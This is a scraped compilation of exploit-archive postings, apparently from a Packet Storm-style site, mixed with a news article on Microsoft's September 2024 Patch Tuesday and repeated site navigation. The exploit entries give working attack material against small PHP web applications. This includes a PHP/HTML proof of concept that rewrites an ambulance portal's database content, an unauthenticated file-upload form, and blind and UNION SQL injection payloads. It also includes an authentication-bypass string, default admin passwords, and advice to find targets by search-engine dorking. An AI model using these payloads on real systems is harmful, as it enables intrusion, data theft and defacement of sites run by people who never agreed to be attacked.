Emergency Ambulance Hiring Portal version 1.0 suffer from a WYSIWYG code injection vulnerability.

=============================================================================================================================================  
| # Title     : Emergency Ambulance Hiring Portal 1.0 (WYSIWYG) code injection Vulnerability                                                |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |  
| # Vendor    : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/                                               |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Part 01 : about-us.php

[+] This payload injects code of your choice into the database via NicEdit is a WYSIWYG editor V: 0.9 r25 which is called inside the file /hms/admin/about-us.php . 

   [+] Line 2  :  Make sure to include your database connection here

[+] Line 44 :  Send the form data using fetch API (Set your target url)

[+] save payload as poc.php in your localhost path .

[+] payload : 

<?php  
include('http://127.0.0.1/eahp/admin/includes/dbconnection.php'); // Make sure to include your database connection here

if (isset($_POST['submit'])) {  
    $pagetitle = $_POST['pagetitle'];  
    $pagedes = $con->real_escape_string($_POST['pagedes']);  
    $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes' WHERE PageType='aboutus'");

    if ($query) {  
        echo '<script>alert("About Us has been updated.")</script>';  
    } else {  
        echo '<script>alert("Something Went Wrong. Please try again.")</script>';  
    }  
    exit;  
}  
?>

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>indoushka | Update About Us Content</title>  
      
    <script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>  
    <script type="text/javascript">  
        // Apply NicEdit to all text areas when the DOM is loaded  
        bkLib.onDomLoaded(nicEditors.allTextAreas);

        // Function to handle form submission using JavaScript  
        function submitForm(event) {  
            event.preventDefault(); // Prevent default form submission

            const pagetitle = document.getElementById('pagetitle').value;  
            const pagedes = nicEditors.findEditor('pagedes').getContent(); // Get the NicEdit content

            // Prepare the form data to be sent  
            const formData = new FormData();  
            formData.append('pagetitle', pagetitle);  
            formData.append('pagedes', pagedes);  
            formData.append('submit', true);

            // Send the form data using fetch API  
            fetch('http://127.0.0.1/eahp/admin/about-us.php', {  
                method: 'POST',  
                body: formData,  
            })  
            .then(response => response.text())  
            .then(data => {  
                alert('About Us content has been updated successfully.');  
                console.log(data); // Handle the response from the server  
            })  
            .catch(error => {  
                console.error('Error:', error);  
            });  
        }  
    </script>  
    <style>  
        /* Center the form container */  
        .editor-container {  
            max-width: 800px;  
            margin: 0 auto; /* Center horizontally */  
            padding: 20px;  
            text-align: center; /* Center the content inside */  
        }

        /* Ensure the textarea takes the full width */  
        #pagedes {  
            width: 100%;  
            height: 300px;  
            margin: 0 auto;  
        }  
    </style>  
</head>  
<body>  
    <div id="app">  
        <div class="app-content">  
            <div class="main-content">  
                <div class="wrap-content container" id="container">  
                      
                    <section id="page-title">  
                        <div class="row">  
                            <div class="col-sm-8">  
                                <h1 class="mainTitle">Update the About Us Content</h1>  
                            </div>

                                                          </li>  
                            </ol>  
                        </div>  
                    </section>  
                      
                    <div class="container-fluid container-fullw bg-white">  
                        <div class="row">  
                            <div class="col-md-12">  
                                  
                                <div class="editor-container">  
                                    <form class="forms-sample" method="post" onsubmit="submitForm(event);">  
                                        <div class="form-group">  
                                            <label for="pagetitle">Page Title</label>  
                                            <input id="pagetitle" name="pagetitle" type="text" class="form-control" required>  
                                        </div>  
                                        <div class="form-group">  
                                            <label for="pagedes">Page Description</label>  
                                              
                                            <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>  
                                        </div>  
                                        <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>  
                                    </form>  
                                </div>  
                            </div>  
                        </div>  
                    </div>  
                      
                </div>  
            </div>  
        </div>  
    </div>  
      
</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Emergency Ambulance Hiring Portal 1.0 WYSIWYG Code Injection

Printable Staff ID Card Creator System version 1.0 suffers from an insecure direct object reference vulnerability.

=============================================================================================================================================  
| # Title     : printable staff id card creator system 1.0 idor Vulnerability                                                               |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |  
| # Vendor    : https://www.campcodes.com/downloads/printable-staff-id-card-creator-system-source-code/?wpdmdl=6749&refresh=66bbc00367bf91723580419               |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Insecure direct object reference: Suffering from an insecure direct object reference that allows users to upload and execute remote files. .

[+] Line : 8 Set your Target

[+] Save As poc.html

[+] payload :

<<div class="modal-content" style="font-size: 14px; font-family: Times New Roman;color:black;">  
      <div class="modal-header" style="background:#222d32">  
        <button type="button" class="close" data-dismiss="modal">×</button>  
        <h4 class="modal-title" style="font-weight: bold;color: #F0F0F0"><center>  
          SYSTEM INFORMATION INITIALISATION  
          </center></h4>  
      </div>  
        <form method="post" action="http://127.0.0.1/Staff_registration/upload.php" enctype="multipart/form-data">            

      <div class="modal-body">           
        <center>   
            <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp;&nbsp;Org Name:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgname"></span></p>  
              <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;Phone:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgphone"></span></p>  
            <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;Email:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgemail"></span></p>  
               <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp;Website:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgwebsite"></span></p>  
               <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">Active Year:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgyear"></span></p>  
                  Attach Organisation Logo:(<h7 style="color:red">Make sure it is a transparent image</h7>)<input name="filed" type="file" id="filed">  
                                      <input type="hidden" name="page" value="admin.php">                                                                      
         </center>  
      </div>  
      <div class="modal-footer">  
        <input type="submit" class="btn btn-success" value="Finish" id="addmember" name="orginitial"> &nbsp;  
        <button type="button" class="btn btn-success" data-dismiss="modal">Close</button>  
      </div>  
      </form></div>

    Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Printable Staff ID Card Creator System 1.0 Insecure Direct Object Reference

Microsoft on Tuesday disclosed that three new security flaws impacting the Windows platform have come under active exploitation as part of its Patch Tuesday update for September 2024.
The monthly security release addresses a total of 79 vulnerabilities, of which seven are rated Critical, 71 are rated Important, and one is rated Moderate in severity. This is aside from 26 flaws that the tech

Windows Security / Vulnerability

Microsoft on Tuesday disclosed that three new security flaws impacting the Windows platform have come under active exploitation as part of its Patch Tuesday update for September 2024.

The monthly security release addresses a total of 79 vulnerabilities, of which seven are rated Critical, 71 are rated Important, and one is rated Moderate in severity. This is aside from 26 flaws that the tech giant resolved in its Chromium-based Edge browser since last month's Patch Tuesday release.

The three vulnerabilities that have been weaponized in a malicious context are listed below, alongside a bug that Microsoft is treating as exploited -

*   **CVE-2024-38014** (CVSS score: 7.8) - Windows Installer Elevation of Privilege Vulnerability
*   **CVE-2024-38217** (CVSS score: 5.4) - Windows Mark-of-the-Web (MotW) Security Feature Bypass Vulnerability
*   **CVE-2024-38226** (CVSS score: 7.3) - Microsoft Publisher Security Feature Bypass Vulnerability
*   **CVE-2024-43491** (CVSS score: 9.8) - Microsoft Windows Update Remote Code Execution Vulnerability

"Exploitation of both CVE-2024-38226 and CVE-2024-38217 can lead to the bypass of important security features that block Microsoft Office macros from running," Satnam Narang, senior staff research engineer at Tenable, said in a statement.

"In both cases, the target needs to be convinced to open a specially crafted file from an attacker-controlled server. Where they differ is that an attacker would need to be authenticated to the system and have local access to it to exploit CVE-2024-38226."

As disclosed by Elastic Security Labs last month, CVE-2024-38217 – also referred to as LNK Stomping – is said to have been abused in the wild as far back as February 2018.

CVE-2024-43491, on the other hand, is notable for the fact that it's similar to the downgrade attack that cybersecurity company SafeBreach detailed early last month.

"Microsoft is aware of a vulnerability in Servicing Stack that has rolled back the fixes for some vulnerabilities affecting Optional Components on Windows 10, version 1507 (initial version released July 2015)," Redmond noted.

"This means that an attacker could exploit these previously mitigated vulnerabilities on Windows 10, version 1507 (Windows 10 Enterprise 2015 LTSB and Windows 10 IoT Enterprise 2015 LTSB) systems that have installed the Windows security update released on March 12, 2024 — KB5035858 (OS Build 10240.20526) or other updates released until August 2024."

The Windows maker further said it can be resolved by installing the September 2024 Servicing stack update (SSU KB5043936) and the September 2024 Windows security update (KB5043083), in that order.

It's also worth pointing out that Microsoft's "Exploitation Detected" assessment for CVE-2024-43491 stems from the rollback of fixes that addressed vulnerabilities impacting some Optional Components for Windows 10 (version 1507) that have been previously exploited.

"No exploitation of CVE-2024-43491 itself has been detected," the company said. "In addition, the Windows product team at Microsoft discovered this issue, and we have seen no evidence that it is publicly known."

**Software Patches from Other Vendors**

In addition to Microsoft, security updates have also been released by other vendors over the past few weeks to rectify several vulnerabilities, including —

*   Adobe
*   Arm
*   Bosch
*   Broadcom (including VMware)
*   Cisco
*   Citrix
*   CODESYS
*   D-Link
*   Dell
*   Drupal
*   F5
*   Fortinet
*   Fortra
*   GitLab
*   Google Android and Pixel
*   Google Chrome
*   Google Cloud
*   Google Wear OS
*   Hitachi Energy
*   HP
*   HP Enterprise (including Aruba Networks)
*   IBM
*   Intel
*   Ivanti
*   Lenovo
*   Linux distributions Amazon Linux, Debian, Oracle Linux, Red Hat, Rocky Linux, SUSE, and Ubuntu
*   MediaTek
*   Mitsubishi Electric
*   MongoDB
*   Mozilla Firefox, Firefox ESR, Focus and Thunderbird
*   NVIDIA
*   ownCloud
*   Palo Alto Networks
*   Progress Software
*   QNAP
*   Qualcomm
*   Rockwell Automation
*   Samsung
*   SAP
*   Schneider Electric
*   Siemens
*   SolarWinds
*   SonicWall
*   Spring Framework
*   Synology
*   Veeam
*   Zimbra
*   Zoho ManageEngine ServiceDesk Plus, SupportCenter Plus, and ServiceDesk Plus MSP
*   Zoom, and
*   Zyxel

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Issues Patches for 79 Flaws, Including 3 Actively Exploited Windows Flaws

PPDB version 2.4-update 6118-1 suffers from a remote blind SQL injection vulnerability.

    =============================================================================================================================================| # Title     : ppdb v2.4-update 6118-1 SQL injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://drive.usercontent.google.com/download?id=1gnVS8xLA-884e7M8V5dc3_i9qNgrviVq&export=download&authuser=0               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload :ppdb/root/del.php?del=-1[+] https://www/127.0.0.1/ppdb/root/del.php?del=-1 <=== inject here[+]     Parameter: del (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: del=-1' AND (SELECT 2786 FROM (SELECT(SLEEP(5)))KDQW) AND 'ycIc'='ycIc    Type: UNION query    Title: Generic UNION query (NULL) - 18 columns    Payload: del=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176717671,0x6d616b4e6e5a77776d47757568445253596a6468726f72584c72484851664b46664c455675544252,0x71717a7871)-- -Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

PPDB 2.4-update 6118-1 SQL Injection

POMS version 1.0 suffers from an ignored default credential vulnerability.

**POMS 1.0 Insecure Settings**

Posted Sep 9, 2024

Authored by indoushka

POMS version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | e96b4926531826f22ee72eeb7f339d7761192178a35f69af5d5141abbc8b63c1

Download | Favorite | View

**POMS 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : POMS v1.0 Insecure Settings Vulnerability                                                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/17375/best-courier-management-system-project-php.html                                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,689)
*   Arbitrary (17,038)
*   BBS (2,859)
*   Bypass (1,904)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,205)
*   Encryption (2,394)
*   Exploit (54,147)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (918)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,208)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,402)
*   Protocol (3,749)
*   Python (1,655)
*   Remote (31,830)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,044)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,704)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,055)
*   Web (10,131)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,118)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,071)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,733)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,808)
*   UNIX (9,452)
*   UnixWare (188)
*   Windows (6,763)
*   Other

POMS 1.0 Insecure Settings

Pharmacy Management System version version 1.0 suffers from an ignored default credential vulnerability.

**Pharmacy Management System version 1.0 Insecure Settings**

Posted Sep 9, 2024

Authored by indoushka

Pharmacy Management System version version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 6c367c1c4b085e72851f370194180a14f132217419dbc26645d989d1f50bd05c

Download | Favorite | View

**Pharmacy Management System version 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Pharmacy Management System version 1.0 Insecure Settings Vulnerability                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/php/15281/multi-language-pharmacy-management-system-project-source-code.html        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/demoocom/admin/?page=user/manage_user&id=8Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,689)
*   Arbitrary (17,038)
*   BBS (2,859)
*   Bypass (1,904)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,205)
*   Encryption (2,394)
*   Exploit (54,147)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (918)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,208)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,402)
*   Protocol (3,749)
*   Python (1,655)
*   Remote (31,830)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,044)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,704)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,055)
*   Web (10,131)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,118)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,071)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,733)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,808)
*   UNIX (9,452)
*   UnixWare (188)
*   Windows (6,763)
*   Other

Pharmacy Management System version 1.0 Insecure Settings

PDF Generator Web Application version 1.0 suffers from an ignored default credential vulnerability.

**PDF Generator Web Application 1.0 Insecure Settings**

Posted Sep 9, 2024

Authored by indoushka

PDF Generator Web Application version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit, web

SHA-256 | ea0edf3e01f27c48e18ff7db4471b92d0d058e7c65718cf02003efd67a75fb49

Download | Favorite | View

**PDF Generator Web Application 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : PDF Generator Web Application v1.0 Insecure Settings Vulnerability                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/php/15243/pdf-generator-web-app-using-tcpdf-and-phpoop-free-source-code.html        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,689)
*   Arbitrary (17,038)
*   BBS (2,859)
*   Bypass (1,904)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,205)
*   Encryption (2,394)
*   Exploit (54,147)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (918)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,208)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,402)
*   Protocol (3,749)
*   Python (1,655)
*   Remote (31,830)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,044)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,704)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,055)
*   Web (10,131)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,118)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,071)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,733)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,808)
*   UNIX (9,452)
*   UnixWare (188)
*   Windows (6,763)
*   Other

PDF Generator Web Application 1.0 Insecure Settings

Park Ticketing Project version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Park Ticketing Project 1.0 Auth By Pass Vulnerability                                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/wp-content/uploads/2019/12/Park-Ticketing-Management-System-Project.zip                              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user&pass = ' or 0=0 ##[+] http://127.0.0.1/ptms/dashboard.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Park Ticketing Project 1.0 SQL Injection

Online Travel Agency System version 1.0 suffers from an ignored default credential vulnerability.

**Online Travel Agency System 1.0 Insecure Settings**

Posted Sep 9, 2024

Authored by indoushka

Online Travel Agency System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 33fc5279701fd33248284f756fca51419cb1e797d0158e5bc05d6612e87f5c60

Download | Favorite | View

**Online Travel Agency System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Online Travel Agency System v1.0 Insecure Settings Vulnerability                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/online-travel-agency-system-using-php.html                                                   |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin[+] https://www/127.0.0.1/165.232.176.12/index.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,689)
*   Arbitrary (17,038)
*   BBS (2,859)
*   Bypass (1,904)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,205)
*   Encryption (2,394)
*   Exploit (54,147)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (918)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,208)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,402)
*   Protocol (3,749)
*   Python (1,655)
*   Remote (31,830)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,044)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,704)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,055)
*   Web (10,131)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,118)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,071)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,733)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,808)
*   UNIX (9,452)
*   UnixWare (188)
*   Windows (6,763)
*   Other

Online Travel Agency System 1.0 Insecure Settings

Online Tours and Travels Management System version 1.0 suffers from an ignored default credential vulnerability.

**Online Tours and Travels Management System 1.0 Insecure Settings**

Posted Sep 9, 2024

Authored by indoushka

Online Tours and Travels Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 4a5b9ca0712889f86abf481cbffe6181dc9758a00fca6adde682fe4a8dea1f53

Download | Favorite | View

**Online Tours and Travels Management System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Online Tours and Travels Management System v1.0 Insecure Settings Vulnerability                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,689)
*   Arbitrary (17,038)
*   BBS (2,859)
*   Bypass (1,904)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,205)
*   Encryption (2,394)
*   Exploit (54,147)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (918)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,208)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,402)
*   Protocol (3,749)
*   Python (1,655)
*   Remote (31,830)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,044)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,704)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,055)
*   Web (10,131)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,118)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,071)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,733)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,808)
*   UNIX (9,452)
*   UnixWare (188)
*   Windows (6,763)
*   Other

Tag

#firefox